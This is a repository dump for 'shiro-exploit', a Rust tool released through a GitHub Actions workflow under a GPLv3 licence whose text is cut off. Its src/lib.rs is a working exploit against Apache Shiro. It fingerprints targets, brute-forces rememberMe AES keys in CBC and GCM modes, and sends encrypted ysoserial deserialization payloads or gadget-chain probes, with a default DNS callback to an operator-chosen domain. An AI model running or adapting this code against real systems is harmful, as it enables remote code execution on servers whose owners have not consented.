22 | env: 23 | BIN_NAME: "shiro-exploit" 24 | jobs: 25 | create-release: 26 | name: "shiro-exploit" 27 | runs-on: ubuntu-latest 28 | outputs: 29 | upload_url: ${{ steps.release.outputs.upload_url }} 30 | release_version: ${{ env.RELEASE_VERSION }} 31 | steps: 32 | - name: Get the release version from the tag 33 | shell: bash 34 | if: env.RELEASE_VERSION == '' 35 | run: | 36 | # See: https://github.community/t5/GitHub-Actions/How-to-get-just-the-tag-name/m-p/32167/highlight/true#M1027 37 | echo "RELEASE_VERSION=${GITHUB_REF#refs/tags/}" >> $GITHUB_ENV 38 | echo "version is: ${{ env.RELEASE_VERSION }}" 39 | - name: Checkout repository 40 | uses: actions/checkout@v2 41 | with: 42 | fetch-depth: 1 43 | - name: Generate Release Notes 44 | run: | 45 | python3 .github/workflows/release-notes.py --tag ${{ env.RELEASE_VERSION }} --output notes-${{ env.RELEASE_VERSION }}.md 46 | cat notes-${{ env.RELEASE_VERSION }}.md 47 | - name: Create GitHub release 48 | id: release 49 | uses: actions/create-release@v1 50 | env: 51 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 52 | with: 53 | tag_name: ${{ env.RELEASE_VERSION }} 54 | release_name: ${{ env.RELEASE_VERSION }} 55 | body_path: notes-${{ env.RELEASE_VERSION }}.md 56 | build-release: 57 | name: build-release 58 | needs: create-release 59 | strategy: 60 | fail-fast: false 61 | matrix: 62 | build: [ linux, macos, macos_m1, win-msvc ] 63 | include: 64 | - build: linux 65 | os: ubuntu-latest 66 | rust: stable 67 | target: x86_64-unknown-linux-musl 68 | file: shiro-exploit_amd64 69 | - build: macos 70 | os: macos-latest 71 | rust: stable 72 | target: x86_64-apple-darwin 73 | file: shiro-exploit_darwin 74 | - build: macos_m1 75 | os: macos-latest 76 | rust: stable 77 | target: aarch64-apple-darwin 78 | file: shiro-exploit_aarch64_darwin 79 | - build: win-msvc 80 | os: windows-latest 81 | rust: stable 82 | target: i686-pc-windows-msvc 83 | file: shiro-exploit.exe 84 | runs-on: ${{ matrix.os }} 85 | steps: 86 | - name: Checkout repository 87 | uses: actions/checkout@v2 88 | with: 89 | fetch-depth: 1 90 | - name: Cache 91 | uses: Swatinem/rust-cache@v1 92 | - name: Install packages (Ubuntu) 93 | if: matrix.os == 'ubuntu-latest' 94 | run: | 95 | sudo apt-get update 96 | sudo apt-get install -y --no-install-recommends xz-utils liblz4-tool libssl-dev musl-tools pkg-config 97 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml 98 | - name: Install packages (Windows) 99 | if: matrix.os == 'windows-latest' 100 | shell: bash 101 | run: | 102 | choco install llvm openssl 103 | export CARGO_PKG_VERSION=`date +'%-Y.%-m.%-d'` 104 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml 105 | echo "CARGO_PKG_VERSION=`date +'%Y.%m.%d'`" >>$GITHUB_ENV 106 | echo "OPENSSL_DIR=C:\Program Files\OpenSSL-Win64" >>$GITHUB_ENV 107 | echo "RUSTFLAGS=-C target-feature=+crt-static" >>$GITHUB_ENV 108 | - name: Install packages (Macos) 109 | if: matrix.os == 'macos-latest' 110 | run: | 111 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml 112 | - name: Install Rust 113 | uses: actions-rs/toolchain@v1 114 | with: 115 | toolchain: ${{ matrix.rust }} 116 | profile: minimal 117 | override: true 118 | target: ${{ matrix.target }} 119 | - name: Build release binary 120 | run: cargo build --target ${{ matrix.target }} --verbose --release 121 | - name: Build archive 122 | shell: bash 123 | run: | 124 | staging="${{ env.BIN_NAME }}_${{ needs.create-release.outputs.release_version }}_${{ matrix.target }}" 125 | mkdir -p "$staging" 126 | cp {README.md,LICENSE} "$staging/" 127 | if [ "${{ matrix.os }}" = "windows-latest" ]; then 128 | bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}.exe" 129 | cp "$bin_file" "$staging/" 130 | cd "$staging" 131 | 7z a "../$staging.zip" . 132 | echo "ASSET=$staging.zip" >> $GITHUB_ENV 133 | echo "BIN_FILE=$bin_file" >> $GITHUB_ENV 134 | else 135 | bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}" 136 | strip "$bin_file" 137 | cp "$bin_file" "$staging/" 138 | tar czf "$staging.tar.gz" -C "$staging" ${{ env.BIN_NAME }} README.md LICENSE 139 | echo "ASSET=$staging.tar.gz" >> $GITHUB_ENV 140 | echo "BIN_FILE=$bin_file" >> $GITHUB_ENV 141 | fi 142 | - name: Upload release archive 143 | uses: actions/upload-release-asset@v1.0.1 144 | env: 145 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 146 | with: 147 | upload_url: ${{ needs.create-release.outputs.upload_url }} 148 | asset_path: ${{ env.ASSET }} 149 | asset_name: ${{ env.ASSET }} 150 | asset_content_type: application/octet-stream 151 | - name: Upload binary to release 152 | uses: svenstaro/upload-release-action@v1-release 153 | with: 154 | repo_token: ${{ secrets.GITHUB_TOKEN }} 155 | file: ${{ env.BIN_FILE }} 156 | asset_name: ${{ matrix.file }} 157 | tag: default 158 | overwrite: true -------------------------------------------------------------------------------- /src/lib.rs: -------------------------------------------------------------------------------- 1 | pub mod cli; 2 | pub mod yso; 3 | 4 | use anyhow::anyhow; 5 | use cli::EmoArgs; 6 | use encoding_rs::{Encoding, UTF_8}; 7 | use mime::Mime; 8 | use once_cell::sync::Lazy; 9 | use openssl::base64::{decode_block, encode_block}; 10 | use openssl::symm::{encrypt, Cipher}; 11 | use prettytable::{color, Attr, Cell, Row, Table}; 12 | use reqwest::header::{HeaderMap, HeaderValue}; 13 | use reqwest::{header, Proxy, Response}; 14 | use reqwest::{Method, Url}; 15 | use select::document::Document; 16 | use select::predicate::Name; 17 | use std::collections::{HashMap, HashSet}; 18 | use std::fs::File; 19 | use std::io; 20 | use std::io::{BufRead, Read}; 21 | use std::path::Path; 22 | use std::sync::Arc; 23 | use std::time::Duration; 24 | 25 | #[derive(Debug)] 26 | pub struct RawData { 27 | pub url: Url, 28 | pub headers: HeaderMap, 29 | pub status_code: reqwest::StatusCode, 30 | pub text: String, 31 | } 32 | 33 | pub static EMO_ARGS: Lazy = Lazy::new(|| -> EmoArgs { EmoArgs::new() }); 34 | static CIPHERS: Lazy> = Lazy::new(|| -> HashMap<&str, Cipher> { 35 | HashMap::from([ 36 | ("CBC", Cipher::aes_128_cbc()), 37 | ("GCM", Cipher::aes_128_gcm()), 38 | ]) 39 | }); 40 | 41 | /// 发送请求,并带上apache-shiro的请求头 42 | async fn send_requests( 43 | url: &Url, 44 | method: Method, 45 | mut headers: HeaderMap, 46 | ) -> anyhow::Result { 47 | let ua = "Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0"; 48 | headers.insert(header::USER_AGENT, header::HeaderValue::from_static(ua)); 49 | let client = reqwest::Client::builder() 50 | .pool_max_idle_per_host(0) 51 | .danger_accept_invalid_certs(true) 52 | .danger_accept_invalid_hostnames(true) 53 | .default_headers(headers.clone()) 54 | // .redirect(reqwest::redirect::Policy::none()) 55 | .timeout(Duration::new(EMO_ARGS.timeout, 0)); 56 | let config_proxy = EMO_ARGS.proxy.clone(); 57 | let proxy_obj = Proxy::custom(move |_| config_proxy.clone()); 58 | return Ok(client 59 | .proxy(proxy_obj) 60 | .build()? 61 | .request(method, url.as_ref()) 62 | .send() 63 | .await?); 64 | } 65 | 66 | pub async fn index_fetch(url_str: &str, method: Method) -> anyhow::Result> { 67 | let schemes: [&str; 2] = ["https://", "http://"]; 68 | for scheme in schemes { 69 | //最大重定向跳转次数 70 | let mut full_url = url_str.to_string(); 71 | if !url_str.to_lowercase().starts_with("http://") 72 | && !url_str.to_lowercase().starts_with("https://") 73 | { 74 | full_url = format!("{}{}", scheme, url_str); 75 | } 76 | let url = Url::parse(&full_url)?; 77 | let mut headers = header::HeaderMap::new(); 78 | headers.insert( 79 | header::COOKIE, 80 | header::HeaderValue::from_static("rememberMe=admin;rememberMe-K=admin"), 81 | ); 82 | if let Ok(res) = send_requests(&url, method.clone(), headers).await { 83 | if let Ok(raw_data) = fetch_raw_data(res).await { 84 | return Ok(raw_data); 85 | }; 86 | }; 87 | } 88 | Err(anyhow!("HTTP ERR")) 89 | } 90 | 91 | async fn fetch_raw_data(res: Response) -> anyhow::Result> { 92 | let status_code = res.status(); 93 | let headers = res.headers().clone(); 94 | let base_url = res.url().clone(); 95 | let text_byte = res.bytes().await.unwrap_or_default(); 96 | let (text, _) = get_default_encoding(&text_byte, headers.clone()); 97 | // 在请求头和正文里匹配下一跳URL 98 | let raw_data = Arc::new(RawData { 99 | url: base_url, 100 | headers, 101 | status_code, 102 | text: text.to_lowercase(), 103 | }); 104 | Ok(raw_data) 105 | } 106 | 107 | /// 获取编码并且尝试解码,返回解码后字符串和是否解码成功 108 | fn get_default_encoding(byte: &[u8], headers: header::HeaderMap) -> (String, bool) { 109 | let (html, _, _) = UTF_8.decode(byte); 110 | let default_encoding = get_charset_from_html(&html); 111 | let content_type = headers 112 | .get(header::CONTENT_TYPE) 113 | .and_then(|value| value.to_str().ok()) 114 | .and_then(|value| value.parse::().ok()); 115 | let header_encoding = content_type 116 | .as_ref() 117 | .and_then(|mime| mime.get_param("charset").map(|charset| charset.as_str())) 118 | .unwrap_or(&default_encoding); 119 | for encoding_name in &[header_encoding, &default_encoding] { 120 | let encoding = Encoding::for_label(encoding_name.as_bytes()).unwrap_or(UTF_8); 121 | let (text, _, is_errors) = encoding.decode(byte); 122 | if !is_errors { 123 | return (text.to_string(), false); 124 | } 125 | } 126 | if let Ok(text) = String::from_utf8(byte.to_vec()) { 127 | return (text, false); 128 | } 129 | return (String::from_utf8_lossy(byte).to_string(), true); 130 | } 131 | 132 | /// reqwest的内部只有从请求头提取编码,这里需要在html里再提取 133 | fn get_charset_from_html(text: &str) -> String { 134 | for metas in Document::from(text).find(Name("meta")) { 135 | if let Some(charset) = metas.attr("charset") { 136 | return charset.to_lowercase(); 137 | } 138 | } 139 | String::from("utf-8") 140 | } 141 | 142 | pub fn make_remember_me(key: &str, cipher: Cipher, data: &[u8]) -> HeaderMap { 143 | let mut iv = uuid::Uuid::new_v4().as_bytes().to_vec(); 144 | let key = decode_block(key).unwrap_or_default(); 145 | let ciphertext = encrypt(cipher, &key, Some(&iv), data); 146 | iv.extend(ciphertext.unwrap_or_default()); 147 | let cookie = format!("rememberMe={}", encode_block(&iv)); 148 | let mut headers = HeaderMap::new(); 149 | headers.insert( 150 | header::COOKIE, 151 | HeaderValue::from_str(&cookie).unwrap_or(header::HeaderValue::from_static("")), 152 | ); 153 | headers 154 | } 155 | 156 | /// 单个目标的shiro校验和key爆破 157 | #[derive(Debug, Clone)] 158 | pub struct ShiroVerify { 159 | pub target: Option, 160 | verify: bool, 161 | mode: String, 162 | method: Method, 163 | key: Option, 164 | } 165 | 166 | impl ShiroVerify { 167 | pub async fn new(target: String) -> Self { 168 | let mut sv = ShiroVerify { 169 | target: None, 170 | verify: false, 171 | mode: "".to_string(), 172 | method: Method::GET, 173 | key: None, 174 | }; 175 | for m in vec![Method::GET, Method::POST] { 176 | sv.method = m.clone(); 177 | if let Ok(rd) = index_fetch(&target, m).await { 178 | sv.target = Some(rd.url.clone()); 179 | if let Some(cookie) = rd.headers.get(header::SET_COOKIE) { 180 | sv.verify = cookie.to_str().unwrap_or_default().contains("=deleteMe"); 181 | return sv; 182 | } 183 | } 184 | } 185 | sv 186 | } 187 | pub async fn burst_key(&mut self) { 188 | let mut keys = HashSet::new(); 189 | keys.insert(EMO_ARGS.key.clone()); 190 | if let Some(file_path) = &EMO_ARGS.keys { 191 | keys.extend(read_file_to_target(file_path)); 192 | } 193 | if self.target.is_none() || !self.verify { 194 | return; 195 | } 196 | let target = self.target.as_ref().unwrap(); 197 | let shiro_spc = yso::get_payload("shiro_spc"); 198 | for (mode, cipher) in CIPHERS.clone().into_iter() { 199 | if let Some(m) = &EMO_ARGS.mode { 200 | if mode != m { 201 | continue; 202 | } 203 | } 204 | 205 | for key in &keys { 206 | let headers = make_remember_me(key, cipher, &shiro_spc); 207 | if let Ok(res) = send_requests(target, self.method.clone(), headers).await { 208 | if let Ok(raw_data) = fetch_raw_data(res).await { 209 | let cookie = raw_data.headers.get(header::SET_COOKIE); 210 | match cookie { 211 | Some(c) => { 212 | if !c.to_str().unwrap_or_default().contains("=deleteMe") { 213 | self.key = Some(key.to_string()); 214 | self.mode = mode.to_string(); 215 | return; 216 | } 217 | } 218 | None => { 219 | self.key = Some(key.to_string()); 220 | self.mode = mode.to_string(); 221 | return; 222 | } 223 | }; 224 | }; 225 | }; 226 | } 227 | } 228 | } 229 | pub async fn exploit(&mut self) { 230 | if self.mode.is_empty() || !self.verify { 231 | return; 232 | } 233 | let key = self.key.clone().unwrap_or_default(); 234 | if let Some(cipher) = CIPHERS.get(self.mode.as_str()) { 235 | if let Some(target) = self.target.clone() { 236 | let headers = ser_to_header(&target, key, cipher); 237 | let _ = send_requests(&target, self.method.clone(), headers).await; 238 | } 239 | } 240 | } 241 | pub async fn enum_chain(&mut self) { 242 | if self.mode.is_empty() || !self.verify { 243 | return; 244 | } 245 | let key = self.key.clone().unwrap_or_default(); 246 | if let Some(cipher) = CIPHERS.get(self.mode.as_str()) { 247 | if let Some(target) = self.target.clone() { 248 | for (p, _) in yso::COMMAND_PAYLOAD_MAP.clone().into_iter() { 249 | let headers = 250 | make_remember_me(&key, *cipher, &yso::get_enum_chain_payload(p, &target)); 251 | let _ = send_requests(&target, self.method.clone(), headers).await; 252 | } 253 | } 254 | } 255 | } 256 | } 257 | 258 | fn ser_to_header(target: &Url, key: String, cipher: &Cipher) -> HeaderMap { 259 | let default_header = HeaderMap::new(); 260 | if let Some(path) = &EMO_ARGS.ser { 261 | let mut buf = Vec::new(); 262 | let file = File::open(path); 263 | if let Ok(mut f) = file { 264 | f.read_to_end(&mut buf).unwrap_or_default(); 265 | } 266 | if buf.is_empty() { 267 | return default_header; 268 | } 269 | let headers = make_remember_me(&key, *cipher, &buf); 270 | return headers; 271 | } 272 | if let Some(p) = &EMO_ARGS.payload { 273 | return make_remember_me(&key, *cipher, &yso::get_payload(p)); 274 | } 275 | // 没有ser文件就默认使用DNS验证 276 | let u = format!( 277 | "http://{}_{}.{}", 278 | target.host_str().unwrap_or_default(), 279 | target.port_or_known_default().unwrap_or_default(), 280 | EMO_ARGS.dns 281 | ); 282 | 283 | make_remember_me(&key, *cipher, &ysoserial_rs::get_url_dns(&u)) 284 | } 285 | 286 | pub fn print_results_and_save(results: Vec) { 287 | let mut table = Table::new(); 288 | let headers = vec![ 289 | Cell::new("url"), 290 | Cell::new("method"), 291 | Cell::new("verify"), 292 | Cell::new("mode"), 293 | Cell::new("key"), 294 | ]; 295 | table.set_titles(Row::new(headers.clone())); 296 | for res in &results { 297 | let mut verify_color = Attr::ForegroundColor(color::RED); 298 | if res.verify { 299 | verify_color = Attr::ForegroundColor(color::GREEN); 300 | } 301 | let mut t = String::new(); 302 | if let Some(target) = res.target.clone() { 303 | t = target.as_str().to_string(); 304 | }; 305 | let rows = vec![ 306 | Cell::new(&t), 307 | Cell::new(res.method.as_str()), 308 | Cell::new(&res.verify.to_string()).with_style(verify_color), 309 | Cell::new(&res.mode), 310 | Cell::new(res.key.clone().unwrap_or_default().as_str()), 311 | ]; 312 | table.add_row(Row::new(rows)); 313 | } 314 | if let Some(csv_path) = &EMO_ARGS.csv { 315 | let out = File::create(csv_path).expect("Failed to create file"); 316 | table.to_csv(out).expect("Failed to save file"); 317 | } 318 | let mut table = Table::new(); 319 | table.set_titles(Row::new(headers)); 320 | for res in &results { 321 | let mut verify_color = Attr::ForegroundColor(color::RED); 322 | if res.verify { 323 | verify_color = Attr::ForegroundColor(color::GREEN); 324 | } 325 | let mut t = String::new(); 326 | if let Some(target) = res.target.clone() { 327 | t = target.as_str().to_string(); 328 | }; 329 | let rows = vec![ 330 | Cell::new(&t), 331 | Cell::new(res.method.as_str()), 332 | Cell::new(&res.verify.to_string()).with_style(verify_color), 333 | Cell::new(&res.mode), 334 | Cell::new(&res.key.clone().unwrap_or_default()), 335 | ]; 336 | table.add_row(Row::new(rows)); 337 | } 338 | if !table.is_empty() { 339 | table.printstd(); 340 | } 341 | } 342 | 343 | pub fn read_file_to_target(file_path: &str) -> HashSet { 344 | if let Ok(lines) = read_lines(file_path) { 345 | let target_list: Vec = lines.filter_map(Result::ok).collect(); 346 | return HashSet::from_iter(target_list); 347 | } 348 | HashSet::from_iter([]) 349 | } 350 | 351 | fn read_lines

(filename: P) -> io::Result>> 352 | where 353 | P: AsRef, 354 | { 355 | let file = File::open(filename)?; 356 | Ok(io::BufReader::new(file).lines()) 357 | } 358 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 